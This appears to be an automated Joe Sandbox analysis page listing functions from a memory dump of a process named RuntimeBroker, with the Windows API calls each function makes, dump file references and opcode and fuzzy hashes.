Function 00007FF72B06B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF72B06B5DD), ref: 00007FF72B06B490
GetLastError.KERNEL32(?,?,?,?,?,00007FF72B06B5DD), ref: 00007FF72B06B49A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: 2a842859367c16081b218a64e9adb14f58672a61e5e86746a8b65955b8c079ef
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 5311BFA1B08A8181DA21AB29AC44179E361FB48BF4F980335EE7D077FACF3CD1508B40

Function 00007FF72B06B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06B1E4

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 12270a8a75ca09993c8c8368b0e1ad6c6286b94bc4b5dc24b1707c41ed112153
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4C41B972B0820247EA35AB1DA95227DB3A0EF5D781F940139DA9D476B1CF3CE503CB61

Function 00007FF72B0576A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF72B05774A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7546fdf25d121e01a387d4e844d1ef2fa81ddd0b8f883c38f86f7b75a69df56f
Instruction ID: 77c8f901887c23e37d59c76d917a642e40c7612d2bb5bf4fdfcb01d6e1cc520e
Opcode Fuzzy Hash: 7546fdf25d121e01a387d4e844d1ef2fa81ddd0b8f883c38f86f7b75a69df56f
Instruction Fuzzy Hash: 84219321B0865546FA32BB1A6D443BAD645FF49BC4FC88430DE0C07BA6DE3DE041CB10

Function 00007FF72B06AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06ACD2

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 15a7f94d2434b57da418998f74f7be344362384a7cc11d0d0c793e61bd31752c
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: 08317E21F1865286E773BB1E9C4137DA650EF58BA5F950139DA2D033F2DE7CA8818B30

Function 00007FF72B068C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B068CA7

Part of subcall function 00007FF72B068DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF72B068DC5
Part of subcall function 00007FF72B068DA0: GetProcAddress.KERNEL32 ref: 00007FF72B068DDB
Part of subcall function 00007FF72B068DA0: FreeLibrary.KERNEL32 ref: 00007FF72B068E02

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: 10796378ce4140bf13a9ac4e117c5cf7332a2d6c647b6b2057e01cf8758d3830
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: 10219132B157058DEB26AF68D8442EC73A0FB48368F84463AD61C06AE5EF78E444CF64

Function 00007FF72B0652A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B065209

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 4fc0c5960fc2bc28e91f2ae739c4df15e835f4aa3d209fe586e70b95d2e2add0
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: DB113021B1964641EA76BF59981027EE2A4EF5AB80F844439EB4C57AA6CE3CD5408B60

Function 00007FF72B075664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B075687

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: 38d1c4e4a4bab0ee81f23f05f374cced832a0f36c7ed4e4d17e28152245e4a1e
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 3E215672A18A4186DB729F1CE8403BDF660EB94B94F944234D65D476EADF3DD800DF10

Function 00007FF72B05F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B05F730

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 42c3af35cf93cdc92a3a1f1ecd281f13aa4051c7f03cfa7541adcb7727036003
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 2B01A521B0874641E925BB5A5D4006DE695FB59FE0F888635DE5C13BEADE3CE4028B10

Function 00007FF72B06C90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF72B05FFB0,?,?,?,00007FF72B06161A,?,?,?,?,?,00007FF72B062E09), ref: 00007FF72B06C94A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: c3c0ce42795c7bc4807a1bd7a02b326b8fa82869ddcfb66acacd385049474d89
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 5CF05E00F1924745FF77777A5C59279D180DF4CB60FC842389D2E452E1DE1CE5418930

Function 00007FF72B0581A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

LoadLibraryW.KERNELBASE(?,00007FF72B055C06,?,00007FF72B05308E), ref: 00007FF72B0581C2

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
Instruction ID: 47da46643f56eb8e86bb9a3fe6e2b3dacf58f5b268fda03f623d59215a1f1d2f
Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
Instruction Fuzzy Hash: 8DD08C01B2424181EA69BB6BAE466799151AB89BC0E888034EE1C07B6ADC3CD0800B04

Function 00007FF72B058180 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,?,?,00007FF72B0533BF), ref: 00007FF72B058184

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
Instruction ID: 881996fef6c2a2139a2e66ed20ccaba875190192bd466715665aef7d9b2a213c
Opcode Fuzzy Hash: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
Instruction Fuzzy Hash: 6FB01220FF540FC1991437798C4E0305150A764702FD01220C006C21B0CC0C00DB0A10

Non-executed Functions

Function 00007FF72B0579B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A1B
RemoveDirectoryW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A9E
DeleteFileW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ABD
FindNextFileW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ACB
FindClose.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ADC
RemoveDirectoryW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057AE5

Strings

%s\*, xrefs: 00007FF72B0579E2

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: e126fa8f0f020adca5bcc0ab7dfd6aee301a81cff63fbca390087eb470560944
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: D1417631A1C54695EE32BB28E8985B9E360FBD4754FC00631E59D42AE4DF3CE646DF10

Function 00007FF72B05C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF72B05C468
RtlCaptureContext.KERNEL32 ref: 00007FF72B05C495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B05C4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B05C4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B05C544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B05C561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B05C56C

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: a21a696c6b090491c6629d0cf89f837637f4ab48af9e5dd4ea38f3ac7b0fc683
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: 15311F72609A8185EB719F64E8907FDB364FB44744F844039DA4D47BA5DF38D549CB20

Function 00007FF72B074F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B074F55

Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC

Part of subcall function 00007FF72B069C58: HeapFree.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

Part of subcall function 00007FF72B069C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C19
Part of subcall function 00007FF72B069C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C3E

_get_daylight.LIBCMT ref: 00007FF72B074F44

Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C

_get_daylight.LIBCMT ref: 00007FF72B0751BA
_get_daylight.LIBCMT ref: 00007FF72B0751CB
_get_daylight.LIBCMT ref: 00007FF72B0751DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction ID: b8c2b5f65684857ba03b04b6275a3d6c74fc9a2e05f0d884f64d1be082add1f6
Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction Fuzzy Hash: AED1A026E1864286E736BF2ADC501BDE3A1FF49B84FC48135DA0D476A6DE3CE441DB60

Function 00007FF72B069924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF72B06999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B0699B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B0699F0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B069A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B069A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B069A3E

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: b3aaac424866fe1e4481d4fbc1dcf890b6384a01501259f7aaf1401a69bdb282
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: B1315E32A18B8185DB759F29E8802BEB3A4FB88754F940135EA9D43B65DF38D146CB10

Function 00007FF72B070B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B070BD0
FindFirstFileExW.KERNEL32 ref: 00007FF72B070CDA

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction ID: 6c269aeb70abeba5c8fdd8854abd405dc6f7c3fa2a5a475cc835093ee82fc2f6
Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction Fuzzy Hash: 34B1E861B1868241EA72AB29DC049B9E350EB44BE4FC45231EE5E47BE5EF3CE441DB10

Function 00007FF72B07518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B0751BA

Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C

_get_daylight.LIBCMT ref: 00007FF72B0751CB

Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC

_get_daylight.LIBCMT ref: 00007FF72B0751DC

Part of subcall function 00007FF72B0748D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748EC

Part of subcall function 00007FF72B069C58: HeapFree.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

